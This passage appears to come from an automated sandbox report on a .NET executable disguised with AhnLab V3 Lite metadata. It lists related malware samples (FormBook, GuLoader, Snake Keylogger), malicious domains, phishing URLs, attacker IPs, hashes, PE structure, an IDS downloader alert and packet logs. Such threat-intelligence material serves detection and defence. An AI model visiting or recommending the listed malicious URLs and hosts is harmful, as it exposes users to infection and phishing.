                                                                          • www.lucynoel6465.shop/jgkl/
                                                                          PO from tpc Type 34.1 34,2 35 Spec 1.jsGet hashmaliciousFormBookBrowse
                                                                          • www.tumbetgirislinki.fit/k566/
                                                                          ebu.ps1Get hashmaliciousFormBookBrowse
                                                                          • www.fz977.xyz/48bq/
                                                                          BIS_MT103 101T000000121121.exeGet hashmaliciousFormBookBrowse
                                                                          • www.cheapwil.shop/ekxu/
                                                                          crypt.exeGet hashmaliciousFormBookBrowse
                                                                          • www.clouser.store/0izs/
                                                                          ReODK2A5DB.exeGet hashmaliciousFormBookBrowse
                                                                          • www.sigaque.today/n61y/
                                                                          xBA5hw2TjG.exeGet hashmaliciousFormBookBrowse
                                                                          • www.fz977.xyz/406r/
                                                                          jKR1K8ayHT.exeGet hashmaliciousFormBookBrowse
                                                                          • www.axis138ae.shop/do5s/
                                                                          23.237.188.42https://www.filemail.com/t/NU6GESpWGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                            https://produksjonsteknologi.filemail.com/t/ov7E7ucSGet hashmaliciousHTMLPhisherBrowse
                                                                              158.101.44.242Swift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              proforma fatura No. 90273641836.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • checkip.dyndns.org/
                                                                              DHl-Global-Documents.jsGet hashmaliciousMassLogger RATBrowse
                                                                              • checkip.dyndns.org/
                                                                              Ziraat_Bankasi_Swift_Messaji.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              #U94f6#U884c#U8f6c#U8d26#U51ed#U8bc1.vbsGet hashmaliciousUnknownBrowse
                                                                              • checkip.dyndns.org/
                                                                              KAI RUI--Particulars.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • checkip.dyndns.org/
                                                                              Request For Quotation.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • checkip.dyndns.org/
                                                                              VSVy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              Swift Copy_18.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              checkip.dyndns.comSwift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              Swift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              INV76280.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 132.226.247.73
                                                                              rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              invoice for payment request.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              New PO 127429.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              BugSplat64.dll.dllGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 193.122.6.168
                                                                              ip.1009.filemail.comhttps://www.filemail.com/t/NU6GESpWGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                              • 23.237.188.42
                                                                              https://produksjonsteknologi.filemail.com/t/ov7E7ucSGet hashmaliciousHTMLPhisherBrowse
                                                                              • 23.237.188.42
                                                                              reallyfreegeoip.orgSwift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.112.1
                                                                              Swift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.64.1
                                                                              [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.96.1
                                                                              INV76280.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.96.1
                                                                              rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.32.1
                                                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.32.1
                                                                              invoice for payment request.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.32.1
                                                                              New PO 127429.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.48.1
                                                                              BugSplat64.dll.dllGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.80.1
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSGSAPPRGA2500277 SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                              • 172.67.143.130
                                                                              8FCifYYJD3.exeGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              YD4v8rni26.exeGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              https://attachmore.com/655659547Get hashmaliciousHTMLPhisherBrowse
                                                                              • 188.114.96.3
                                                                              A615KS1xse.exeGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              5w24y9krJf.exeGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              xvdz1Ivbfi.exeGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              HNAid20.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                              • 172.65.251.78
                                                                              https://ipfs.io/ipfs/bafkreihmaoototrz76nrvalxjpmx7e35kweph3mj7elwgr5aajb4x35xgq#info@vicentia.netGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              HN21.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                              • 172.65.251.78
                                                                              COGENT-174USBANK SLIP_TT COPY_003456864-2-18-2024_pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                              • 143.244.46.149
                                                                              Quote-553780956787535101-UAE-24_pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                              • 143.244.46.149
                                                                              http://www.telegramsis.com/Get hashmaliciousMicroClipBrowse
                                                                              • 206.238.199.106
                                                                              http://m.jzjxzdh.com/Get hashmaliciousUnknownBrowse
                                                                              • 38.174.150.60
                                                                              Udeladelsers21.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 38.11.101.101
                                                                              rBANKSLIP_TTCOPY70997011-2-18-2024_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 143.244.46.149
                                                                              https://jne-9co.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 206.84.104.20
                                                                              spc.elfGet hashmaliciousMiraiBrowse
                                                                              • 38.182.55.125
                                                                              sh4.elfGet hashmaliciousMiraiBrowse
                                                                              • 149.44.241.38
                                                                              mips.elfGet hashmaliciousMiraiBrowse
                                                                              • 38.142.165.150
                                                                              ORACLE-BMC-31898USSwift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              http://begqdb574eqtf.webhop.net/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 168.138.216.227
                                                                              New PO 127429.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              BugSplat64.dll.dllGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 193.122.6.168
                                                                              60069-PO-13228.pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 193.122.130.0
                                                                              RFQ-INQUIRY#46883-A24.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              proforma fatura No. 90273641836.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 158.101.44.242
                                                                              rlgh5walrVUMJyT7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              54328bd36c14bd82ddaa0c04b25ed9adSwift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              Swift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              INV76280.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.16.1
                                                                              rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              invoice for payment request.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              New PO 127429.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              BugSplat64.dll.dllGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.16.1
                                                                              3b5074b1b5d032e5620f69f9f700ff0eHNAid20.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                              • 23.237.188.42
                                                                              russelia.wsfGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                              • 23.237.188.42
                                                                              tidsubestemtes.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                              • 23.237.188.42
                                                                              HN21.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                              • 23.237.188.42
                                                                              Neuromalacia.batGet hashmaliciousGuLoaderBrowse
                                                                              • 23.237.188.42
                                                                              Overassertively.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                              • 23.237.188.42
                                                                              Chorogi.wsfGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                              • 23.237.188.42
                                                                              Swift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 23.237.188.42
                                                                              Lovform.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                              • 23.237.188.42
                                                                              Decolourants.batGet hashmaliciousGuLoaderBrowse
                                                                              • 23.237.188.42
                                                                              No context
                                                                              No created / dropped files found
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):2.4330695143537504
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:AWB_3570456515#U00b7PDF.scr.exe
                                                                              File size:340'992 bytes
                                                                              MD5:5b95c93a80d1aadfc50c8f1cd4983f50
                                                                              SHA1:839ed03bd96764233e30d53e46213381661176f6
                                                                              SHA256:c81350a2c2132b610fb4198970fafa7b8a3a3897a9555421e1d0842e959fd3cc
                                                                              SHA512:837d3e67307350766bd5f4bbb71adfe3d5579d852d0841f4211e0817563c70aa33b13dc7d9259039014f51c2ab3bf9c9f02c149d2a1bd7a5edb585f5adc19f25
                                                                              SSDEEP:768:HQXrEQe2VzEjss2yXg1ILcn0sspAgpq80Lyg1uMN0+dzsRU+eEH:wXgQ7E/pqrLy0uyz+fH
                                                                              TLSH:B974CA5A7674A132ED00CA3419F69E11D2DBAE6C2BF0951D24D8F66D1B326FE8F039C1
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...uR.g............................*3... ...@....@.. ....................................`................................
                                                                              Icon Hash:0e3333b0bbb3b035
                                                                              Entrypoint:0x40332a
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x67B75275 [Thu Feb 20 16:04:05 2025 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x32e00x4a.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x51a9a.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x560000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000x13300x1400af93b6e0f95bb4f01ca620e0ee5be75fFalse0.5697265625data5.392843827853888IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x40000x51a9a0x51c003c383c46bc7fddbe0b08d9a02cf3c485False0.07167729835626911data2.3525643272623045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x560000xc0x2008eca33cb61873620f318d26387e802b0False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x40cc0x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.7601351351351351
                                                                              RT_ICON0x42180x368Device independent bitmap graphic, 16 x 32 x 24, image size 8320.7155963302752294
                                                                              RT_ICON0x45a40x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6826241134751773
                                                                              RT_ICON0x4a300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.5389784946236559
                                                                              RT_ICON0x4d3c0xca8Device independent bitmap graphic, 32 x 64 x 24, image size 32000.470679012345679
                                                                              RT_ICON0x5a080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4378517823639775
                                                                              RT_ICON0x6ad40x668Device independent bitmap graphic, 48 x 96 x 4, image size 15360.36402439024390243
                                                                              RT_ICON0x71600x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 72960.33110687022900764
                                                                              RT_ICON0x8e2c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.30881742738589213
                                                                              RT_ICON0xb3f80xa68Device independent bitmap graphic, 64 x 128 x 4, image size 25600.2924174174174174
                                                                              RT_ICON0xbe840x3228Device independent bitmap graphic, 64 x 128 x 24, image size 128000.26580996884735203
                                                                              RT_ICON0xf0d00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.24244213509683515
                                                                              RT_ICON0x1331c0x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.014139568600763382
                                                                              RT_GROUP_ICON0x553800xbcdata0.5797872340425532
                                                                              RT_VERSION0x554780x3fcdata0.40784313725490196
                                                                              RT_MANIFEST0x558b00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain
                                                                              DescriptionData
                                                                              Translation0x0000 0x04b0
                                                                              CommentsAhnLab V3 Lite Main UI Application
                                                                              CompanyNameAhnLab, Inc.
                                                                              FileDescriptionAhnLab V3 Lite Main UI Application
                                                                              FileVersion4.0.0.117
                                                                              InternalNameXmbjtystp.exe
                                                                              LegalCopyright 2018-2019 AhnLab, Inc. All rights reserved.
                                                                              LegalTrademarks
                                                                              OriginalFilenameXmbjtystp.exe
                                                                              ProductNameAhnLab V3 Lite
                                                                              ProductVersion4.0.0.117
                                                                              Assembly Version4.0.0.117
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-02-21T08:58:23.445598+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549929158.101.44.24280TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 21, 2025 08:57:30.359723091 CET4970480192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:30.364820957 CET804970423.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:30.365015030 CET4970480192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:30.365689993 CET4970480192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:30.370697021 CET804970423.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:30.961100101 CET804970423.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:30.963654995 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:30.963697910 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:30.963759899 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:30.974211931 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:30.974225998 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:31.008424044 CET4970480192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:31.755021095 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:31.755089998 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:31.759237051 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:31.759243965 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:31.759510994 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:31.805254936 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:31.814464092 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:31.859338045 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:31.984025002 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:31.984236002 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:31.984256029 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:31.984353065 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:31.984366894 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:31.984417915 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:31.984426975 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:31.988624096 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:31.988712072 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:31.988718033 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.039649963 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.070736885 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.070768118 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.070785046 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.071074009 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.071082115 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.071439981 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.071460009 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.071508884 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.071515083 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.071541071 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.072252989 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.072297096 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.072324038 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.072329044 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.072345972 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.072442055 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.072505951 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.072510958 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.117877007 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.157613039 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.157708883 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.157726049 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.157819986 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.157819986 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.157819986 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.157831907 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.157919884 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.157979012 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.157991886 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.157996893 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.158030033 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.158282995 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.158344984 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.158349037 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.159075975 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.159142971 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.159147978 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.159210920 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.159286976 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.159291983 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.160056114 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.160126925 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.160130978 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.160192966 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.160259008 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.160264015 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.161021948 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.161089897 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.161096096 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.211524963 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.244858027 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.244885921 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.244946957 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.244990110 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.244995117 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.245125055 CET4434970523.237.188.42192.168.2.5
